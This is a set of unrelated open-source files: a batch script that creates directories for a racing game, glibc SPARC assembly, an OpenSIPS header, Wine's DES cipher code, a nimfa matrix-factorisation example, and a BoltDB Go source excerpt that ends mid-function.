call .\create_dir .\%RUNTIMEDIR%\results\ncrace
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\practice
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\quickrace
if exist .\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\*.* call .\create_dir .\%RUNTIMEDIR%\.
if exist .\setup_linux.sh copy .\setup_linux.sh .\%RUNTIMEDIR%\.\setup_linux.sh
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\bt
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\damned
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\human
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\sparkle
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\tita
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\graphic
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\simu
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\simu
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\telemetry
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\track
| {
"pile_set_name": "Github"
} |
! SPARC v9 64-bit VIS3 __mpn_submul_1 -- Multiply a limb vector with a
! limb and subtract the result from a second limb vector.
!
! Copyright (C) 2013-2018 Free Software Foundation, Inc.
! This file is part of the GNU C Library.
! Contributed by David S. Miller <[email protected]>
!
! The GNU C Library is free software; you can redistribute it and/or
! modify it under the terms of the GNU Lesser General Public
! License as published by the Free Software Foundation; either
! version 2.1 of the License, or (at your option) any later version.
!
! The GNU C Library is distributed in the hope that it will be useful,
! but WITHOUT ANY WARRANTY; without even the implied warranty of
! MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
! Lesser General Public License for more details.
!
! You should have received a copy of the GNU Lesser General Public
! License along with the GNU C Library; if not, see
! <http://www.gnu.org/licenses/>.
#include <sysdep.h>
#define res_ptr %i0
#define s1_ptr %i1
#define sz %i2
#define s2_limb %i3
#define carry %o5
#define tmp1 %g1
#define tmp2 %g2
#define tmp3 %g3
#define tmp4 %o4
#define tmp5 %l0
#define tmp6 %l1
#define tmp7 %l2
#define tmp8 %l3
.register %g2,#scratch
.register %g3,#scratch
ENTRY(__mpn_submul_1_vis3)
save %sp, -176, %sp
subcc sz, 1, sz
be .Lfinal_limb
clr carry
.Lloop:
ldx [s1_ptr + 0x00], tmp1
ldx [res_ptr + 0x00], tmp3
ldx [s1_ptr + 0x08], tmp2
ldx [res_ptr + 0x08], tmp4
mulx tmp1, s2_limb, tmp5
add s1_ptr, 0x10, s1_ptr
umulxhi tmp1, s2_limb, tmp6
add res_ptr, 0x10, res_ptr
mulx tmp2, s2_limb, tmp7
sub sz, 2, sz
umulxhi tmp2, s2_limb, tmp8
addcc carry, tmp5, tmp5
addxc %g0, tmp6, carry
subcc tmp3, tmp5, tmp5
addxc %g0, carry, carry
stx tmp5, [res_ptr - 0x10]
addcc carry, tmp7, tmp7
addxc %g0, tmp8, carry
subcc tmp4, tmp7, tmp7
addxc %g0, carry, carry
brgz sz, .Lloop
stx tmp7, [res_ptr - 0x08]
brlz,pt sz, .Lfinish
nop
.Lfinal_limb:
ldx [s1_ptr + 0x00], tmp1
ldx [res_ptr + 0x00], tmp3
mulx tmp1, s2_limb, tmp5
umulxhi tmp1, s2_limb, tmp6
addcc carry, tmp5, tmp5
addxc %g0, tmp6, carry
subcc tmp3, tmp5, tmp5
addxc %g0, carry, carry
stx tmp5, [res_ptr + 0x00]
.Lfinish:
jmpl %i7 + 8, %g0
restore carry, 0, %o0
END(__mpn_submul_1_vis3)
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2012 OpenSIPS Solutions
*
* This file is part of opensips, a free SIP server.
*
* opensips is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version
*
* opensips is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
* History:
* -------
* 2012-01-19 created (vlad)
*/
#ifndef _parser_h_
#define _parser_h_
#include "menus.h"
#include "cfg.h"
#define GRP_START_STR "#DEFS_GROUP_START"
#define GRP_END_STR "#DEFS_GROUP_END"
#define SKIP_LINE_STR "##"
#define SKIP_LINE_STRL 2
int parse_dep_line(char *line,select_menu *parent);
int parse_include_line(char *line,select_menu *parent);
int parse_defs_line(char *line,select_menu *parent,int *group_idx,int *start_grp);
int parse_prefix_line(char *line,select_menu *menu);
int parse_defs_m4_line(char *line,select_menu *menu);
int parse_defs_m4(select_menu *curr_menu,cfg_gen_t *curr_cfg);
int parse_make_conf();
#endif
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2004 Hans Leidekker
* Copyright 2006 Mike McCormack
*
* Based on DES.c from libcifs
*
* Copyright (C) 2003, 2004 by Christopher R. Hertel
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA
*/
#include "windef.h"
#include "crypt.h"
static const unsigned char InitialPermuteMap[64] =
{
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7,
56, 48, 40, 32, 24, 16, 8, 0,
58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6
};
static const unsigned char KeyPermuteMap[56] =
{
49, 42, 35, 28, 21, 14, 7, 0,
50, 43, 36, 29, 22, 15, 8, 1,
51, 44, 37, 30, 23, 16, 9, 2,
52, 45, 38, 31, 55, 48, 41, 34,
27, 20, 13, 6, 54, 47, 40, 33,
26, 19, 12, 5, 53, 46, 39, 32,
25, 18, 11, 4, 24, 17, 10, 3,
};
static const unsigned char KeyRotation[16] =
{ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 };
static const unsigned char KeyCompression[48] =
{
13, 16, 10, 23, 0, 4, 2, 27,
14, 5, 20, 9, 22, 18, 11, 3,
25, 7, 15, 6, 26, 19, 12, 1,
40, 51, 30, 36, 46, 54, 29, 39,
50, 44, 32, 47, 43, 48, 38, 55,
33, 52, 45, 41, 49, 35, 28, 31
};
static const unsigned char DataExpansion[48] =
{
31, 0, 1, 2, 3, 4, 3, 4,
5, 6, 7, 8, 7, 8, 9, 10,
11, 12, 11, 12, 13, 14, 15, 16,
15, 16, 17, 18, 19, 20, 19, 20,
21, 22, 23, 24, 23, 24, 25, 26,
27, 28, 27, 28, 29, 30, 31, 0
};
static const unsigned char SBox[8][64] =
{
{ /* S0 */
14, 0, 4, 15, 13, 7, 1, 4, 2, 14, 15, 2, 11, 13, 8, 1,
3, 10, 10, 6, 6, 12, 12, 11, 5, 9, 9, 5, 0, 3, 7, 8,
4, 15, 1, 12, 14, 8, 8, 2, 13, 4, 6, 9, 2, 1, 11, 7,
15, 5, 12, 11, 9, 3, 7, 14, 3, 10, 10, 0, 5, 6, 0, 13
},
{ /* S1 */
15, 3, 1, 13, 8, 4, 14, 7, 6, 15, 11, 2, 3, 8, 4, 14,
9, 12, 7, 0, 2, 1, 13, 10, 12, 6, 0, 9, 5, 11, 10, 5,
0, 13, 14, 8, 7, 10, 11, 1, 10, 3, 4, 15, 13, 4, 1, 2,
5, 11, 8, 6, 12, 7, 6, 12, 9, 0, 3, 5, 2, 14, 15, 9
},
{ /* S2 */
10, 13, 0, 7, 9, 0, 14, 9, 6, 3, 3, 4, 15, 6, 5, 10,
1, 2, 13, 8, 12, 5, 7, 14, 11, 12, 4, 11, 2, 15, 8, 1,
13, 1, 6, 10, 4, 13, 9, 0, 8, 6, 15, 9, 3, 8, 0, 7,
11, 4, 1, 15, 2, 14, 12, 3, 5, 11, 10, 5, 14, 2, 7, 12
},
{ /* S3 */
7, 13, 13, 8, 14, 11, 3, 5, 0, 6, 6, 15, 9, 0, 10, 3,
1, 4, 2, 7, 8, 2, 5, 12, 11, 1, 12, 10, 4, 14, 15, 9,
10, 3, 6, 15, 9, 0, 0, 6, 12, 10, 11, 1, 7, 13, 13, 8,
15, 9, 1, 4, 3, 5, 14, 11, 5, 12, 2, 7, 8, 2, 4, 14
},
{ /* S4 */
2, 14, 12, 11, 4, 2, 1, 12, 7, 4, 10, 7, 11, 13, 6, 1,
8, 5, 5, 0, 3, 15, 15, 10, 13, 3, 0, 9, 14, 8, 9, 6,
4, 11, 2, 8, 1, 12, 11, 7, 10, 1, 13, 14, 7, 2, 8, 13,
15, 6, 9, 15, 12, 0, 5, 9, 6, 10, 3, 4, 0, 5, 14, 3
},
{ /* S5 */
12, 10, 1, 15, 10, 4, 15, 2, 9, 7, 2, 12, 6, 9, 8, 5,
0, 6, 13, 1, 3, 13, 4, 14, 14, 0, 7, 11, 5, 3, 11, 8,
9, 4, 14, 3, 15, 2, 5, 12, 2, 9, 8, 5, 12, 15, 3, 10,
7, 11, 0, 14, 4, 1, 10, 7, 1, 6, 13, 0, 11, 8, 6, 13
},
{ /* S6 */
4, 13, 11, 0, 2, 11, 14, 7, 15, 4, 0, 9, 8, 1, 13, 10,
3, 14, 12, 3, 9, 5, 7, 12, 5, 2, 10, 15, 6, 8, 1, 6,
1, 6, 4, 11, 11, 13, 13, 8, 12, 1, 3, 4, 7, 10, 14, 7,
10, 9, 15, 5, 6, 0, 8, 15, 0, 14, 5, 2, 9, 3, 2, 12
},
{ /* S7 */
13, 1, 2, 15, 8, 13, 4, 8, 6, 10, 15, 3, 11, 7, 1, 4,
10, 12, 9, 5, 3, 6, 14, 11, 5, 0, 0, 14, 12, 9, 7, 2,
7, 2, 11, 1, 4, 14, 1, 7, 9, 4, 12, 10, 14, 8, 2, 13,
0, 15, 6, 12, 10, 9, 13, 0, 15, 3, 3, 5, 5, 6, 8, 11
}
};
static const unsigned char PBox[32] =
{
15, 6, 19, 20, 28, 11, 27, 16,
0, 14, 22, 25, 4, 17, 30, 9,
1, 7, 23, 13, 31, 26, 2, 8,
18, 12, 29, 5, 21, 10, 3, 24
};
static const unsigned char FinalPermuteMap[64] =
{
7, 39, 15, 47, 23, 55, 31, 63,
6, 38, 14, 46, 22, 54, 30, 62,
5, 37, 13, 45, 21, 53, 29, 61,
4, 36, 12, 44, 20, 52, 28, 60,
3, 35, 11, 43, 19, 51, 27, 59,
2, 34, 10, 42, 18, 50, 26, 58,
1, 33, 9, 41, 17, 49, 25, 57,
0, 32, 8, 40, 16, 48, 24, 56
};
#define CLRBIT( STR, IDX ) ( (STR)[(IDX)/8] &= ~(0x01 << (7 - ((IDX)%8))) )
#define SETBIT( STR, IDX ) ( (STR)[(IDX)/8] |= (0x01 << (7 - ((IDX)%8))) )
#define GETBIT( STR, IDX ) (( ((STR)[(IDX)/8]) >> (7 - ((IDX)%8)) ) & 0x01)
static void Permute( unsigned char *dst, const unsigned char *src, const unsigned char *map, const int mapsize )
{
int bitcount, i;
for (i = 0; i < mapsize; i++)
dst[i] = 0;
bitcount = mapsize * 8;
for (i = 0; i < bitcount; i++)
{
if (GETBIT( src, map[i] ))
SETBIT( dst, i );
}
}
static void KeyShiftLeft( unsigned char *key, const int numbits )
{
int i;
unsigned char keep = key[0];
for (i = 0; i < numbits; i++)
{
int j;
for (j = 0; j < 7; j++)
{
if (j && (key[j] & 0x80))
key[j-1] |= 0x01;
key[j] <<= 1;
}
if (GETBIT( key, 27 ))
{
CLRBIT( key, 27 );
SETBIT( key, 55 );
}
if (keep & 0x80)
SETBIT( key, 27 );
keep <<= 1;
}
}
static void KeyShiftRight( unsigned char *key, const int numbits )
{
int i;
unsigned char keep = key[6];
for (i = 0; i < numbits; i++)
{
int j;
for (j = 6; j >= 0; j--)
{
if (j!=6 && (key[j] & 0x01))
key[j+1] |= 0x80;
key[j] >>= 1;
}
if (GETBIT( key, 28 ))
{
CLRBIT( key, 28 );
SETBIT( key, 0 );
}
if (keep & 0x01)
SETBIT( key, 28 );
keep >>= 1;
}
}
static void sbox( unsigned char *dst, const unsigned char *src )
{
int i;
for (i = 0; i < 4; i++)
dst[i] = 0;
for (i = 0; i < 8; i++)
{
int j, Snum, bitnum;
for (Snum = j = 0, bitnum = (i * 6); j < 6; j++, bitnum++)
{
Snum <<= 1;
Snum |= GETBIT( src, bitnum );
}
if (0 == (i%2))
dst[i/2] |= ((SBox[i][Snum]) << 4);
else
dst[i/2] |= SBox[i][Snum];
}
}
static void xor( unsigned char *dst, const unsigned char *a, const unsigned char *b, const int count )
{
int i;
for (i = 0; i < count; i++)
dst[i] = a[i] ^ b[i];
}
unsigned char *CRYPT_DEShash( unsigned char *dst, const unsigned char *key, const unsigned char *src )
{
int i;
unsigned char K[7];
unsigned char D[8];
Permute( K, key, KeyPermuteMap, 7 );
Permute( D, src, InitialPermuteMap, 8 );
for (i = 0; i < 16; i++)
{
int j;
unsigned char *L = D;
unsigned char *R = &(D[4]);
unsigned char Rexp[6];
unsigned char Rn[4];
unsigned char SubK[6];
KeyShiftLeft( K, KeyRotation[i] );
Permute( SubK, K, KeyCompression, 6 );
Permute( Rexp, R, DataExpansion, 6 );
xor( Rexp, Rexp, SubK, 6 );
sbox( Rn, Rexp );
Permute( Rexp, Rn, PBox, 4 );
xor( Rn, L, Rexp, 4 );
for (j = 0; j < 4; j++)
{
L[j] = R[j];
R[j] = Rn[j];
}
}
Permute( dst, D, FinalPermuteMap, 8 );
return dst;
}
unsigned char *CRYPT_DESunhash( unsigned char *dst, const unsigned char *key, const unsigned char *src )
{
int i;
unsigned char K[7];
unsigned char D[8];
Permute( K, key, KeyPermuteMap, 7 );
Permute( D, src, InitialPermuteMap, 8 );
for (i = 0; i < 16; i++)
{
int j;
unsigned char *L = D;
unsigned char *R = &(D[4]);
unsigned char Rexp[6];
unsigned char Rn[4];
unsigned char SubK[6];
Permute( SubK, K, KeyCompression, 6 );
Permute( Rexp, R, DataExpansion, 6 );
xor( Rexp, Rexp, SubK, 6 );
sbox( Rn, Rexp );
Permute( Rexp, Rn, PBox, 4 );
xor( Rn, L, Rexp, 4 );
for (j = 0; j < 4; j++)
{
L[j] = R[j];
R[j] = Rn[j];
}
KeyShiftRight( K, KeyRotation[15 - i] );
}
Permute( dst, D, FinalPermuteMap, 8 );
return dst;
}
| {
"pile_set_name": "Github"
} |
import numpy as np
import scipy.sparse as sp
import nimfa
V = np.random.rand(40, 100)
V1 = np.random.rand(40, 200)
snmnmf = nimfa.Snmnmf(V=V, V1=V1, seed="random_c", rank=10, max_iter=12,
A=sp.csr_matrix((V1.shape[1], V1.shape[1])),
B=sp.csr_matrix((V.shape[1], V1.shape[1])), gamma=0.01,
gamma_1=0.01, lamb=0.01, lamb_1=0.01)
snmnmf_fit = snmnmf()
| {
"pile_set_name": "Github"
} |
package bolt
import (
"errors"
"fmt"
"hash/fnv"
"log"
"os"
"runtime"
"runtime/debug"
"strings"
"sync"
"time"
"unsafe"
)
// The largest step that can be taken when remapping the mmap.
const maxMmapStep = 1 << 30 // 1GB
// The data file format version.
const version = 2
// Represents a marker value to indicate that a file is a Bolt DB.
const magic uint32 = 0xED0CDAED
// IgnoreNoSync specifies whether the NoSync field of a DB is ignored when
// syncing changes to a file. This is required as some operating systems,
// such as OpenBSD, do not have a unified buffer cache (UBC) and writes
// must be synchronized using the msync(2) syscall.
const IgnoreNoSync = runtime.GOOS == "openbsd"
// Default values if not set in a DB instance.
const (
DefaultMaxBatchSize int = 1000
DefaultMaxBatchDelay = 10 * time.Millisecond
DefaultAllocSize = 16 * 1024 * 1024
)
// default page size for db is set to the OS page size.
var defaultPageSize = os.Getpagesize()
// DB represents a collection of buckets persisted to a file on disk.
// All data access is performed through transactions which can be obtained through the DB.
// All the functions on DB will return a ErrDatabaseNotOpen if accessed before Open() is called.
type DB struct {
// When enabled, the database will perform a Check() after every commit.
// A panic is issued if the database is in an inconsistent state. This
// flag has a large performance impact so it should only be used for
// debugging purposes.
StrictMode bool
// Setting the NoSync flag will cause the database to skip fsync()
// calls after each commit. This can be useful when bulk loading data
// into a database and you can restart the bulk load in the event of
// a system failure or database corruption. Do not set this flag for
// normal use.
//
// If the package global IgnoreNoSync constant is true, this value is
// ignored. See the comment on that constant for more details.
//
// THIS IS UNSAFE. PLEASE USE WITH CAUTION.
NoSync bool
// When true, skips the truncate call when growing the database.
// Setting this to true is only safe on non-ext3/ext4 systems.
// Skipping truncation avoids preallocation of hard drive space and
// bypasses a truncate() and fsync() syscall on remapping.
//
// https://github.com/boltdb/bolt/issues/284
NoGrowSync bool
// If you want to read the entire database fast, you can set MmapFlag to
// syscall.MAP_POPULATE on Linux 2.6.23+ for sequential read-ahead.
MmapFlags int
// MaxBatchSize is the maximum size of a batch. Default value is
// copied from DefaultMaxBatchSize in Open.
//
// If <=0, disables batching.
//
// Do not change concurrently with calls to Batch.
MaxBatchSize int
// MaxBatchDelay is the maximum delay before a batch starts.
// Default value is copied from DefaultMaxBatchDelay in Open.
//
// If <=0, effectively disables batching.
//
// Do not change concurrently with calls to Batch.
MaxBatchDelay time.Duration
// AllocSize is the amount of space allocated when the database
// needs to create new pages. This is done to amortize the cost
// of truncate() and fsync() when growing the data file.
AllocSize int
path string
file *os.File
lockfile *os.File // windows only
dataref []byte // mmap'ed readonly, write throws SEGV
data *[maxMapSize]byte
datasz int
filesz int // current on disk file size
meta0 *meta
meta1 *meta
pageSize int
opened bool
rwtx *Tx
txs []*Tx
freelist *freelist
stats Stats
pagePool sync.Pool
batchMu sync.Mutex
batch *batch
rwlock sync.Mutex // Allows only one writer at a time.
metalock sync.Mutex // Protects meta page access.
mmaplock sync.RWMutex // Protects mmap access during remapping.
statlock sync.RWMutex // Protects stats access.
ops struct {
writeAt func(b []byte, off int64) (n int, err error)
}
// Read only mode.
// When true, Update() and Begin(true) return ErrDatabaseReadOnly immediately.
readOnly bool
}
// Path returns the path to currently open database file.
func (db *DB) Path() string {
return db.path
}
// GoString returns the Go string representation of the database.
func (db *DB) GoString() string {
return fmt.Sprintf("bolt.DB{path:%q}", db.path)
}
// String returns the string representation of the database.
func (db *DB) String() string {
return fmt.Sprintf("DB<%q>", db.path)
}
// Open creates and opens a database at the given path.
// If the file does not exist then it will be created automatically.
// Passing in nil options will cause Bolt to open the database with the default options.
func Open(path string, mode os.FileMode, options *Options) (*DB, error) {
var db = &DB{opened: true}
// Set default options if no options are provided.
if options == nil {
options = DefaultOptions
}
db.NoGrowSync = options.NoGrowSync
db.MmapFlags = options.MmapFlags
// Set default values for later DB operations.
db.MaxBatchSize = DefaultMaxBatchSize
db.MaxBatchDelay = DefaultMaxBatchDelay
db.AllocSize = DefaultAllocSize
flag := os.O_RDWR
if options.ReadOnly {
flag = os.O_RDONLY
db.readOnly = true
}
// Open data file and separate sync handler for metadata writes.
db.path = path
var err error
if db.file, err = os.OpenFile(db.path, flag|os.O_CREATE, mode); err != nil {
_ = db.close()
return nil, err
}
// Lock file so that other processes using Bolt in read-write mode cannot
// use the database at the same time. This would cause corruption since
// the two processes would write meta pages and free pages separately.
// The database file is locked exclusively (only one process can grab the lock)
// if !options.ReadOnly.
// The database file is locked using the shared lock (more than one process may
// hold a lock at the same time) otherwise (options.ReadOnly is set).
if err := flock(db, mode, !db.readOnly, options.Timeout); err != nil {
_ = db.close()
return nil, err
}
// Default values for test hooks
db.ops.writeAt = db.file.WriteAt
// Initialize the database if it doesn't exist.
if info, err := db.file.Stat(); err != nil {
return nil, err
} else if info.Size() == 0 {
// Initialize new files with meta pages.
if err := db.init(); err != nil {
return nil, err
}
} else {
// Read the first meta page to determine the page size.
var buf [0x1000]byte
if _, err := db.file.ReadAt(buf[:], 0); err == nil {
m := db.pageInBuffer(buf[:], 0).meta()
if err := m.validate(); err != nil {
// If we can't read the page size, we can assume it's the same
// as the OS -- since that's how the page size was chosen in the
// first place.
//
// If the first page is invalid and this OS uses a different
// page size than what the database was created with then we
// are out of luck and cannot access the database.
db.pageSize = os.Getpagesize()
} else {
db.pageSize = int(m.pageSize)
}
}
}
// Initialize page pool.
db.pagePool = sync.Pool{
New: func() interface{} {
return make([]byte, db.pageSize)
},
}
// Memory map the data file.
if err := db.mmap(options.InitialMmapSize); err != nil {
_ = db.close()
return nil, err
}
// Read in the freelist.
db.freelist = newFreelist()
db.freelist.read(db.page(db.meta().freelist))
// Mark the database as opened and return.
return db, nil
}
// mmap opens the underlying memory-mapped file and initializes the meta references.
// minsz is the minimum size that the new mmap can be.
func (db *DB) mmap(minsz int) error {
db.mmaplock.Lock()
defer db.mmaplock.Unlock()
info, err := db.file.Stat()
if err != nil {
return fmt.Errorf("mmap stat error: %s", err)
} else if int(info.Size()) < db.pageSize*2 {
return fmt.Errorf("file size too small")
}
// Ensure the size is at least the minimum size.
var size = int(info.Size())
if size < minsz {
size = minsz
}
size, err = db.mmapSize(size)
if err != nil {
return err
}
// Dereference all mmap references before unmapping.
if db.rwtx != nil {
db.rwtx.root.dereference()
}
// Unmap existing data before continuing.
if err := db.munmap(); err != nil {
return err
}
// Memory-map the data file as a byte slice.
if err := mmap(db, size); err != nil {
return err
}
// Save references to the meta pages.
db.meta0 = db.page(0).meta()
db.meta1 = db.page(1).meta()
// Validate the meta pages. We only return an error if both meta pages fail
// validation, since meta0 failing validation means that it wasn't saved
// properly -- but we can recover using meta1. And vice-versa.
err0 := db.meta0.validate()
err1 := db.meta1.validate()
if err0 != nil && err1 != nil {
return err0
}
return nil
}
// munmap unmaps the data file from memory.
func (db *DB) munmap() error {
if err := munmap(db); err != nil {
return fmt.Errorf("unmap error: " + err.Error())
}
return nil
}
// mmapSize determines the appropriate size for the mmap given the current size
// of the database. The minimum size is 32KB and doubles until it reaches 1GB.
// Returns an error if the new mmap size is greater than the max allowed.
func (db *DB) mmapSize(size int) (int, error) {
// Double the size from 32KB until 1GB.
for i := uint(15); i <= 30; i++ {
if size <= 1<<i {
return 1 << i, nil
}
}
// Verify the requested size is not above the maximum allowed.
if size > maxMapSize {
return 0, fmt.Errorf("mmap too large")
}
// If larger than 1GB then grow by 1GB at a time.
sz := int64(size)
if remainder := sz % int64(maxMmapStep); remainder > 0 {
sz += int64(maxMmapStep) - remainder
}
// Ensure that the mmap size is a multiple of the page size.
// This should always be true since we're incrementing in MBs.
pageSize := int64(db.pageSize)
if (sz % pageSize) != 0 {
sz = ((sz / pageSize) + 1) * pageSize
}
// If we've exceeded the max size then only grow up to the max size.
if sz > maxMapSize {
sz = maxMapSize
}
return int(sz), nil
}
// init creates a new database file and initializes its meta pages.
func (db *DB) init() error {
// Set the page size to the OS page size.
db.pageSize = os.Getpagesize()
// Create two meta pages on a buffer.
buf := make([]byte, db.pageSize*4)
for i := 0; i < 2; i++ {
p := db.pageInBuffer(buf[:], pgid(i))
p.id = pgid(i)
p.flags = metaPageFlag
// Initialize the meta page.
m := p.meta()
m.magic = magic
m.version = version
m.pageSize = uint32(db.pageSize)
m.freelist = 2
m.root = bucket{root: 3}
m.pgid = 4
m.txid = txid(i)
m.checksum = m.sum64()
}
// Write an empty freelist at page 3.
p := db.pageInBuffer(buf[:], pgid(2))
p.id = pgid(2)
p.flags = freelistPageFlag
p.count = 0
// Write an empty leaf page at page 4.
p = db.pageInBuffer(buf[:], pgid(3))
p.id = pgid(3)
p.flags = leafPageFlag
p.count = 0
// Write the buffer to our data file.
if _, err := db.ops.writeAt(buf, 0); err != nil {
return err
}
if err := fdatasync(db); err != nil {
return err
}
return nil
}
// Close releases all database resources.
// All transactions must be closed before closing the database.
func (db *DB) Close() error {
db.rwlock.Lock()
defer db.rwlock.Unlock()
db.metalock.Lock()
defer db.metalock.Unlock()
db.mmaplock.RLock()
defer db.mmaplock.RUnlock()
return db.close()
}
func (db *DB) close() error {
if !db.opened {
return nil
}
db.opened = false
db.freelist = nil
// Clear ops.
db.ops.writeAt = nil
// Close the mmap.
if err := db.munmap(); err != nil {
return err
}
// Close file handles.
if db.file != nil {
// No need to unlock read-only file.
if !db.readOnly {
// Unlock the file.
if err := funlock(db); err != nil {
log.Printf("bolt.Close(): funlock error: %s", err)
}
}
// Close the file descriptor.
if err := db.file.Close(); err != nil {
return fmt.Errorf("db file close: %s", err)
}
db.file = nil
}
db.path = ""
return nil
}
// Begin starts a new transaction.
// Multiple read-only transactions can be used concurrently but only one
// write transaction can be used at a time. Starting multiple write transactions
// will cause the calls to block and be serialized until the current write
// transaction finishes.
//
// Transactions should not be dependent on one another. Opening a read
// transaction and a write transaction in the same goroutine can cause the
// writer to deadlock because the database periodically needs to re-mmap itself
// as it grows and it cannot do that while a read transaction is open.
//
// If a long running read transaction (for example, a snapshot transaction) is
// needed, you might want to set DB.InitialMmapSize to a large enough value
// to avoid potential blocking of write transaction.
//
// IMPORTANT: You must close read-only transactions after you are finished or
// else the database will not reclaim old pages.
func (db *DB) Begin(writable bool) (*Tx, error) {
if writable {
return db.beginRWTx()
}
return db.beginTx()
}
func (db *DB) beginTx() (*Tx, error) {
// Lock the meta pages while we initialize the transaction. We obtain
// the meta lock before the mmap lock because that's the order that the
// write transaction will obtain them.
db.metalock.Lock()
// Obtain a read-only lock on the mmap. When the mmap is remapped it will
// obtain a write lock so all transactions must finish before it can be
// remapped.
db.mmaplock.RLock()
// Exit if the database is not open yet.
if !db.opened {
db.mmaplock.RUnlock()
db.metalock.Unlock()
return nil, ErrDatabaseNotOpen
}
// Create a transaction associated with the database.
t := &Tx{}
t.init(db)
// Keep track of transaction until it closes.
db.txs = append(db.txs, t)
n := len(db.txs)
// Unlock the meta pages.
db.metalock.Unlock()
// Update the transaction stats.
db.statlock.Lock()
db.stats.TxN++
db.stats.OpenTxN = n
db.statlock.Unlock()
return t, nil
}
func (db *DB) beginRWTx() (*Tx, error) {
// If the database was opened with Options.ReadOnly, return an error.
if db.readOnly {
return nil, ErrDatabaseReadOnly
}
// Obtain writer lock. This is released by the transaction when it closes.
// This enforces only one writer transaction at a time.
db.rwlock.Lock()
// Once we have the writer lock then we can lock the meta pages so that
// we can set up the transaction.
db.metalock.Lock()
defer db.metalock.Unlock()
// Exit if the database is not open yet.
if !db.opened {
db.rwlock.Unlock()
return nil, ErrDatabaseNotOpen
}
// Create a transaction associated with the database.
t := &Tx{writable: true}
t.init(db)
db.rwtx = t
// Free any pages associated with closed read-only transactions.
var minid txid = 0xFFFFFFFFFFFFFFFF
for _, t := range db.txs {
if t.meta.txid < minid {
minid = t.meta.txid
}
}
if minid > 0 {
